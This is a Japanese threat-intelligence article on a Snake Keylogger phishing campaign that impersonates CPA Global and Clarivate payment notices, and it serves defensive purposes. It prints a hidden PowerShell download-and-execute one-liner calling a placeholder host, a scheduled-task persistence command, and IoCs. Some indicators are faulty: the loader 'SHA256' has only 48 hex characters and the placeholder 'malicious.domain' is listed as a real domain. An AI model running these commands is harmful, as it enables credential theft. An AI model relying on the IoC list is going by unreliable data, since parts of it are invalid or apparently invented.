概要:Snake Keyloggerによる新たな情報窃取キャンペーン
最近、Snake Keyloggerマルウェアの新たな亜種を用いた情報窃取キャンペーンが確認されました。このキャンペーンでは、CPA GlobalおよびClarivateからの正規の送金通知を装った巧妙なフィッシングメールが悪用されています。研究者らは、2025年10月7日に「remittance advice for the payment dated 07-Oct-2025」という件名のメールが受信者に届き、悪意のあるBATスクリプトを含むISOまたはZIPファイルをダウンロードするよう促されたことで、この感染経路を初めて特定しました。
分析の結果、このマルウェアは埋め込まれたPowerShellコマンドを利用してSnake Keyloggerのペイロードをダウンロード・実行し、窃取した認証情報を攻撃者が制御するインフラに送信していることが判明しました。
感染経路:武器化されたメールとソーシャルエンジニアリング
このキャンペーンのソーシャルエンジニアリングは、「CPA-Payment Files」のような偽の送信者エイリアスや、CPA GlobalまたはClarivateを参照する表示名を中心に展開されており、フィッシングの誘い込みに偽の正当性を与えています。メールには、添付された支払い通知を確認するよう求める短いテキストと、企業のレターヘッドを模倣した画像が含まれています。
悪意のある添付ファイルは、ISOイメージまたは圧縮されたZIPアーカイブとして配信され、どちらも単一のBATスクリプトを含んでいます。このスクリプトが実行されると、PowerShellコマンドのシーケンスがサイレントに呼び出され、リモートサーバーからSnake Keyloggerインプラントをダウンロードして実行します。ISOコンテナの使用は、単純なZIPのみのスキャンポリシーを回避するのに役立ち、二段階のアーキテクチャは検出を困難にしています。
PowerShellによる展開メカニズム
ユーザーが添付ファイルを操作すると、BATスクリプトは以下のようなPowerShellワンライナーを実行します。
powershell -NoProfile -WindowStyle Hidden -Command "$u='http://malicious[.]domain/loader.exe';$p='$env:TEMP\update.exe';Invoke-WebRequest -Uri $u -OutFile $p;Start-Process $p"
このコマンドは、PowerShellにSnake Keyloggerの実行可能ファイル(loader.exe)を一時ディレクトリにダウンロードさせ、それを起動するよう指示します。隠されたウィンドウ形式により、視覚的な兆候は最小限に抑えられます。実行されると、Snake KeyloggerはブラウザプロセスとキーロギングAPIにフックし、認証情報とセッショントークンをキャプチャします。マルウェアは、そのコア機能を800KB未満の軽量な実行可能ファイルにパックしており、迅速なダウンロードと実行を可能にしています。研究者らは、ペイロードがWindows APIコールを使用してexplorer.exeやsvchost.exeなどの正規プロセスにインジェクトし、エンドポイント保護ソリューションをさらに回避していることを確認しました。
データ窃取と永続化メカニズム
キー入力とクリップボードデータを収集した後、Snake Keyloggerはログを圧縮し、HTTP POSTリクエストを介して侵害されたWebサーバーでホストされているコマンド&コントロール(C2)エンドポイントに送信します。標準的なHTTPユーザーエージェントの使用とBase64エンコーディングによる暗号化により、データ窃取トラフィックは正規に見えます。
マルウェアは、1時間ごとにトリガーされる「SysUpdate」という名前のスケジュールされたタスクを作成することで永続性を実現します。
powershell schtasks /Create /TN "SysUpdate" /TR "%TEMP%\update.exe" /SC HOURLY /F
これにより、プロセスが終了しても自動的に再起動されます。アナリストはまた、脅威アクターがフォールバック接続のために複数のサブドメインを登録しており、C2インフラの高い可用性を可能にしていることを発見しました。
組織への推奨事項とIoC
Snake Keyloggerキャンペーンは、単純なソーシャルエンジニアリングとPowerShellのような組み込みのWindowsツールを組み合わせることで、いかにステルスな認証情報窃取を大規模に実行できるかを示しています。組織は、支払い関連のメールを精査するようユーザーの意識を強化し、堅牢な添付ファイルサンドボックスポリシーを実装し、悪意のあるプロセスインジェクションやデータ窃取活動を捕捉するための行動ベースの検出を採用する必要があります。スケジュールされたタスクとネットワークの出口ポイントの強化されたロギングは、機密データが侵害される前にこの脅威を特定し、阻止するために不可欠です。
侵害の痕跡(Indicators of Compromise: IoC)
- 悪意のあるドメイン:
malicious.domain - SHA256 (loader.exe):
9f3c2a5b4d6e8f12c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8 - スケジュールされたタスク名:
SysUpdate - PowerShellワンライナーフラグ:
-NoProfile -WindowStyle Hidden -Command - フィッシング送信者エイリアス:
CPA-Payment Files - SHA256 (ZIPメール添付ファイル):
1bf2e282e0b58814838af57c8792b6147eacedb3f954821b8eea3b79e1f77cb3 - SHA256 (ISOメール添付ファイル):
fb17cc142e92edd5c683c3d53ff8e15f73c67b65df116827f92c9f81c672ec26 - SHA256 (BATダウンローダー):
929fc6575e8ca6b7a657c784254693c4a343e0576bc64a8ba42eac5003796e68 - PowerShellスクリプトURL:
hxxp://fxa[.]sabitaxt[.]com/mc55tP.ps1
セキュリティチームは、特定されたドメイン、ハッシュ値、およびスケジュールされたタスクを境界およびエンドポイント層でブロックすることが推奨されます。メールフィルタリングソリューションは、ISOファイルの検査を厳格化し、添付ファイル内にPowerShellコマンドを含むメールにフラグを立てるべきです。エンドポイント保護プラットフォームは、異常なプロセスインジェクションや承認されていないスケジュールされたタスクを検出するように調整する必要があります。